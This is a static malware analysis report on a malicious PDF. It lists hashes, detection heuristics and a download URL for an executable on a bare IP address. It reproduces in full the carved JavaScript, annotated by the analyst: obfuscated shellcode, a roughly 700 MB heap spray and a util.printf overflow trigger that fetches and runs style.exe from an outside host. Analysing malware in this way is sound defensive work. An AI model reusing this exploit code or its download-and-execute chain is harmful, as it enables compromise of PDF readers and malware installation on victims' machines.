Malicious PDF — malware analysis report

Static analysis result for SHA-256 b4aecf5d1fac701b…

MALICIOUS

PDF

Size: 3.1 KB · Created: 2008-08-03 07:51:49 -09:03 · Authoring application: Adobe InDesign CS3 (5.0) (via Adobe PDF Library 8.1) · First seen: 2026-05-08
MD5: 4521be2db60d72061f030e91d8a45cec SHA-1: 4cace1470e1e1d7d62ad004cda5c186dd974079c SHA-256: b4aecf5d1fac701bef25826be9837b5915eccd0595280432e7be95ada99b58c4
Risk score: 150

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The unescape() call suggests obfuscation, and a suspicious JavaScript file was extracted. That script also references a URL pointing at an executable (see the EMBEDDED_URL finding), so it likely attempts to download and execute a second-stage payload, which is a common technique for initial access.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 5

  • JavaScript action — severity: low — 2 related findings — PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster — severity: critical — PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    OS80c = unescape(""+abrvalg((
    "9z09x09xx0900feb335rb66c98r0b98001ef33e243e"+
  • Embedded JS stream — severity: low — PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact — severity: info — EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL — severity: info — EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://78.26.179.61/style.exe?id=0&sid=7b4b7c48784e7d4e7c4d7023764b2754335d32417c497e4f7d4a7b4f&e=98 Referenced by PDF JavaScript

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0013_001.js | pdf-javascript-stream | PDF /JS object 13 at offset 0x37C | 2628 bytes
SHA-256: 6c869b3b40cb7f55dfe76cebaabbf6c7195f55451b5cf39a2754e5bdd1fbaef0
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
// Analyst annotation of the carved script (javascript_obj0013_001.js).
// The code below is reproduced byte-for-byte as extracted; only these
// comments were added. They describe what the visible statements do and
// flag indicators; anything not directly shown by the code is hedged.
function NXi7UcVQQ() {
// Hard-coded download URL: an .exe fetched from a bare IPv4 host with an
// opaque "sid" parameter (same URL as the EMBEDDED_URL finding).
var LUcv5 = "http://78.26.179.61/style.exe?id=0&sid=7b4b7c48784e7d4e7c4d7023764b2754335d32417c497e4f7d4a7b4f&e=98";
// Receives the URL re-encoded as %uXXXX escapes (built by the loop below).
var YbAIGy = '';
   // Decoder: consumes 4 hex digits at a time and re-emits them as a
   // "%uXXXX" escape (each 2-digit half is normalised through parseInt /
   // toString(16) and zero-padded back to 2 digits). Net effect is
   // hex -> unescape()-ready string; callers strip filler letters first.
   function abrvalg(arg) {
      var out = "";
      for (var i=0; i<arg.length;i=i+4) {
         var br1 = parseInt('0x'+arg[i] + arg[i+1], 16).toString(16);
         var br2 = parseInt('0x'+arg[i+2] + arg[i+3], 16).toString(16);
         if(br2.length == 1) { br2 = "0" + br2; };
         if(br1.length == 1) { br1 = "0" + br1; };
         out = out + "%u" + br1 + br2;
      }
      return out;
  }
	
// Packs the URL two characters per %u escape, with char i+1 as the high
// byte and char i as the low byte (little-endian 16-bit units). `i` is an
// undeclared (implicit global) variable here.
for (i = 0; i < LUcv5.length; ) 
{
YbAIGy += '%u' + ((i+1<LUcv5.length)?LUcv5.charCodeAt(i+1).toString(16):'00')+LUcv5.charCodeAt(i).toString(16);	
i = i + 2;
}

// Obfuscated hex blob: the letters z/x/s/w/q/r are filler and are removed
// by the .replace() calls (one inner chunk is filtered separately) before
// abrvalg() turns the remaining hex into %u escapes and unescape() yields a
// raw binary string. Given the surrounding construction this is presumably
// the executable payload stage (shellcode) — confirm by decoding offline.
OS80c = unescape(""+abrvalg((
"9z09x09xx0900feb335rb66c98r0b98001ef33e243e"+
"bfaze805xffecfffrf8b7fdf4eefef64efe3af9f"+
"6442f39zf64x6ee7erf03ezfeb64efb9036187e1a"+
"10z703ef11efefaa66b9zeb7787651107e1ef1f"+
"efefaa66bz9e7ca871r05f072defz0defefaa66b"+
"9e391870dx37079cef3rbefefaa66zb9ff2e870a"+
"960757ef29ezfefaa66arxffbd76f9a2c6615f7a"+
"ae806efeeb1ezf9a6664crbebaaexe8564b6f7ba"+
("07b9ef64efef87zbff5d9r9fxcz07807efef66eff").replace(new RegExp(/[zxswqr]/g),"")+
"3aa2ax6z42f6c66bfcfaa10rz87efefbfefaa6485"+
"fbb6edxba6407zf7ef8eefefraaexc28cfb3efc19"+
"1288raexbaf8a97efef9a10z64rcfe3xaaee8564b6"+
"f7baarzfx07efef85efb7exz8aaecdccbbc3410bcc"+
"f9axbcrbfaa648z5f3b6eabxa6407f7zefccefefef"+
"859xa1zr064cfe7aaed8564b6zf7baff07efef85e"+
"f64exfffraaee856z4b6f7baef07efefaeefbdb4"+
"0eec0xeecr0eec0eecz036cb5eb64bcz0d35bd180"+
"f1064bxa64rz03e792b264b9e39c6464d3f19bec"+
"97b91c9x964rzeccfdc1ca62642ae2cecdcb9e01"+
"9ff511dd5e7xr9b212zeece2af1d1ez0411d49ab1"+
"b50a0464b564erccb8932e36464a4zf3b532ece"+
"b64xec64b12a2xrdb2zefe71b071011zba10a3bda0a2efa1"
).replace(new RegExp(/[zxswqr]/g),"")));

// The URL, now as a binary string of 16-bit units.
home = unescape(YbAIGy);

// Decoded blob immediately followed by the URL — consistent with a payload
// that reads its download target from the bytes after itself (inferred).
runnable = OS80c+home;
// "0505"+"0505" after filtering -> "%u0505%u0505" -> two 0x0505 units;
// a short repeating filler pattern.
skipper = unescape(abrvalg(("0zx505"+"w0r5q0qq5").replace(new RegExp(/[zxswqr]/g),"")));

// Double the filler until it covers runnable plus 20 units.
while (skipper.length<20+runnable.length)
{
	skipper+=skipper;
}

// skipper1: exactly 20 + runnable.length units of filler.
// skipper2: the remainder, used as the seed for the large block below.
skipper1 = skipper.substring(0, 20+runnable.length);
skipper2 = skipper.substring(0, skipper.length-20-runnable.length);

// Grow skipper2 to just under 0x40000 (262144) units so that
// skipper2 + runnable is ~0x40000 units (~512 KiB) per block.
while(skipper2.length<(0x40000-20-runnable.length))
{
	skipper2 += skipper2;
	skipper2 += skipper1;//skipper2 = skipper2+skipper2+skipper1;
}

// Allocates 1414 copies of (filler + payload), i.e. on the order of
// 700 MB of identical blocks. This filler-then-payload layout repeated
// across a large array is the pattern commonly described as a heap
// spray; treat it as a strong indicator, in line with the exploit-cluster
// heuristic above. `context` and `ii` are implicit globals.
context = new Array();
ii=-1;

while(++ii<1414)
{
	context[ii] = skipper2 + runnable;
}

// Builds a 296-character numeric string: "12" + 18 x "9" + 276 x "8".
var n2m2 = 12;
for(i = 0; i < 18; i++){ n2m2 = n2m2 + "9"; }
for(i = 0; i < 276; i++){ n2m2 = n2m2 + "8"; }
// Format string hidden as letters: replacing l/k/u/d with '%' gives
// "%25%34%35%30%30%30%66", which unescape() decodes to "%45000f".
var str = "l25k34u35d30u30d30l66";
var fyt = unescape(str.replace(new RegExp(/[lkud]/g),"%"));
// Aliases the Acrobat `util` object, presumably so the API name does not
// appear next to the call for simple string matching.
var fmck = util;
// util.printf with a very wide numeric format and an oversized argument
// after the spray: consistent with a format-string/overflow trigger in
// the PDF reader's JavaScript API rather than legitimate formatting.
// This call is the detection point for the PDF_JS_EXPLOIT_CLUSTER rating.
fmck.printf(fyt, n2m2);
	};